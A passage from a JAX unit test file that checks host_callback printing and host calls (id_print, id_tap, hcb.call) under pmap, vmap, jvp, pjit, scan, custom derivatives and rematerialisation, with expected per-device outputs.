assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: x,x^2
( 3 9 )
device: cpu:1 what: x,x^2
( 4 16 )""")
def test_tap_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = jax.pmap(
jax.vmap(partial(fun1, do_print=True)), devices=local_devices())
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
jax.vmap(partial(fun1, do_print=False)), devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
def test_tap_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = jax.pmap(
jax.pmap(jax.vmap(partial(fun1, do_print=True))),
devices=local_devices())
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
jax.pmap(jax.vmap(partial(fun1, do_print=False))),
devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
@ignore_jit_of_pmap_warning()
def test_tap_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.pmap(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
def test_tap_jvp_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(local_devices())
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.jvp(jax.pmap(jax.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute jax.jvp(jax.vmap(...)) for matrix[0, :, :]
if FLAGS.jax_host_callback_ad_transforms:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
else:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[20.00 22.00 24.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[200.00 202.00 204.00]
[220.00 222.00 224.00]]""")
def test_tap_vmap_pmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(local_devices())
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.vmap(jax.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute jax.jvp(jax.vmap(...)) for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
@ignore_jit_of_pmap_warning()
def test_tap_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if len(local_devices()) == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert len(local_devices()) == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
@unittest.skip("cond of pmap does not work in JAX. Issue #5178.")
def test_tap_cond_pmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, jax.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_tap_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_tap_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
@partial(jax.named_call, name="fun1") # for xprof debugging
def fun1(x, do_print=False):
z = jnp.dot(x, y)
return maybe_print(do_print, z, "z", tap_with_device=True)
res0 = fun1(x, do_print=False)
pjit_fun1 = pjit.pjit(
partial(fun1, do_print=True),
in_axis_resources=(P("d"),),
out_axis_resources=P("d"))
with maps.Mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun1,
x,
num_partitions=nr_devices)
res = pjit_fun1(x)
self.assertAllClose(res0, res)
hcb.barrier_wait("before check")
# Assertion text is for 2 devices (also works for 1 device)
# Note that a single call is made.
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: z
[[ 3 3 3 3]
[33 33 33 33]]""")
def test_tap_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_tap_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
def test_tap_mask(self):
@partial(jax.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
jax.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] ) ( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
jax.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4] [0. 0.2 0.4 0.6 0.8] ) ( ( False ) ( False ) ) ) )""",
testing_stream.output)
else:
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., jax.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
def test_tap_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what=f"x times {i}", output_stream=testing_stream)
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait("first")
expected = """
what: x times 1
[[0. 1. 2.]
[3. 4. 5.]]
what: x times 2
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times 3
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait("second")
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_client.XlaBuilder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 0,
[xops.Constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_tap_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_client.XlaBuilder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xops.Constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xops.Constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xops.Constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_tap_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
jax.grad(loss)(1.0) # should not fail
def test_tap_remat_0(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, jax.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_use_remat={use_remat}_{grad_func}_use_result={use_result}",
use_result=use_result, use_remat=use_remat, grad_func=grad_func)
for use_result in [True, False]
for grad_func in ["grad", "value_and_grad"]
for use_remat in ["old", "new", "none"]))
def test_tap_remat(self, use_result=False, grad_func="grad", use_remat="new"):
def f(x):
id_print_result = hcb.id_print(x, output_stream=testing_stream)
if use_result:
x = id_print_result
return 3. * x
grad_f = jax.grad if grad_func == "grad" else jax.value_and_grad
if use_remat == "old":
trans_f = jax.remat(f)
elif use_remat == "new":
trans_f = ad_checkpoint.checkpoint(f)
else:
assert use_remat == "none"
trans_f = f
print(jax.make_jaxpr(grad_f(trans_f))(2.))
grad_f(trans_f)(2.)
hcb.barrier_wait()
if use_remat == "none":
if use_result:
if FLAGS.jax_host_callback_ad_transforms:
expected = """
2.
transforms: ['jvp', 'transpose']
3."""
else:
# GOOD: whether or not we use_result, in absence of
# jax_host_callback_ad_transforms we get the same callback.
expected = "2."
else:
expected = "2."
else: # use_remat
if use_result:
if FLAGS.jax_host_callback_ad_transforms:
expected = """
2.
2.
transforms: ['jvp', 'transpose']
3."""
else:
expected = """
2.
2."""
else:
if use_remat == "old":
# TODO: we should see two callbacks
expected = ""
else:
# Good: we see two callbacks, whether or not we use the result.
expected = """
2.
2."""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(x):
return 2 * x
def fun(x):
y = hcb.call(f_outside, x + 1, result_shape=x)
return 3 * (1 + y)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(3 * (1 + 2 * (arg + 1)), fun(arg))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_{np.dtype(dtype).name}", dtype=dtype)
for dtype in jtu.dtypes.all
if dtype != np.bool_))
def test_call_types(self, dtype=np.float64):
def f_outside(x):
# Use x + x to ensure that the result type is the same
return x + x
def fun(x):
return hcb.call(f_outside, x + x, result_shape=x)
arg = np.arange(24, dtype=dtype).reshape((2, 3, 4))
self.assertAllClose(arg + arg + arg + arg, fun(arg), check_dtypes=True)
def test_call_types_bool(self, dtype=np.float64):
def f_outside(x):
return np.invert(x)
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = self.rng().choice(a=[True, False], size=(2, 3, 4))
self.assertAllClose(np.invert(arg), fun(arg))
def test_call_tuples(self):
def f_outside(args):
x, y = args
return y, x # Swap the tuple
def fun(x):
xy = hcb.call(f_outside, (x, x + 1), result_shape=(x, x))
return 2 * xy[0] + 3 * xy[1]
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(2 * (arg + 1) + 3 * arg, fun(arg))
def test_call_empty_arg(self):
"""Call with empty array."""
result = np.ones((2,), dtype=np.float32)
def f_outside(_):
return result
def fun(x):
return x + hcb.call(f_outside, (),
result_shape=jax.ShapeDtypeStruct(result.shape, result.dtype))
self.assertAllClose(2. + result, fun(2.))
def test_call_empty_result(self):
"""Call returning empty array."""
result_shape = (2, 0)
def f_outside(_):
return np.ones(result_shape, dtype=np.float32)
def fun(x):
return x + hcb.call(f_outside, 1.,
result_shape=jax.ShapeDtypeStruct(result_shape, np.float32))
self.assertAllClose(f_outside(0.), fun(2.))
def test_call_empty_result_inside_pytree(self):
"""Call returning a tuple with an empty array and a non-empty one."""
result_shape_0 = (2, 0)
result_shape_2 = (0,)
def f_outside(_):
return (np.ones(result_shape_0, dtype=np.float32),
np.ones((1,), dtype=np.float32),
np.ones(result_shape_2, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape_0, np.float32),
jax.ShapeDtypeStruct((1,), np.float32),
jax.ShapeDtypeStruct(result_shape_2, np.float32)))
self.assertEqual(result_shape_0, res[0].shape)
self.assertEqual(result_shape_2, res[2].shape)
return x + res[1]
self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))
def test_call_empty_result_all_pytree(self):
"""Call returning a tuple of empty arrays."""
result_shape = (2, 0)
def f_outside(_):
return (np.ones(result_shape, dtype=np.float32),
np.ones(result_shape, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape, np.float32),
jax.ShapeDtypeStruct(result_shape, np.float32)))
return x + res[0] + res[1]
self.assertAllClose(np.ones(result_shape, dtype=np.float32),
fun(2.))
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, jax.jit(loop)(1.2))
def test_call_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = jax.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_call_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=jax.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
def test_call_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function."""
def fun1(m):
return jnp.sin(hcb.call(lambda x: np.cos,
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun1, m)
def fun2(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun2, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(len(local_devices()), dtype=jnp.int32)
res = jax.pmap(fun)(xv)
self.assertAllClose(jax.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError,
"batching rules are implemented only for id_tap, not for call"):
jax.vmap(fun)(np.ones((2, 3)))
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_call_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_call_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
def callback_x5_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(5, np.int32)
def fun(x):
xy = jnp.dot(x, y)
return hcb.call(
callback_x5_func, xy, result_shape=xy, call_with_device=True)
pjit_fun = pjit.pjit(
fun, in_axis_resources=(P("d"),), out_axis_resources=P("d"))
with maps.Mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun,
x,
num_partitions=nr_devices)
res = pjit_fun(x)
expected_res = jnp.dot(x, y) * np.array(5, np.int32)
self.assertAllClose(expected_res, res, check_dtypes=False)
hcb.barrier_wait("before assertion")
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0
Called with [[ 3 3 3 3]
[33 33 33 33]]""")
def test_call_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_call_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_call_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_call_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return jax.jit(jax_outside_fun)(jax.device_put(arg, device))
@jax.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=jax.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
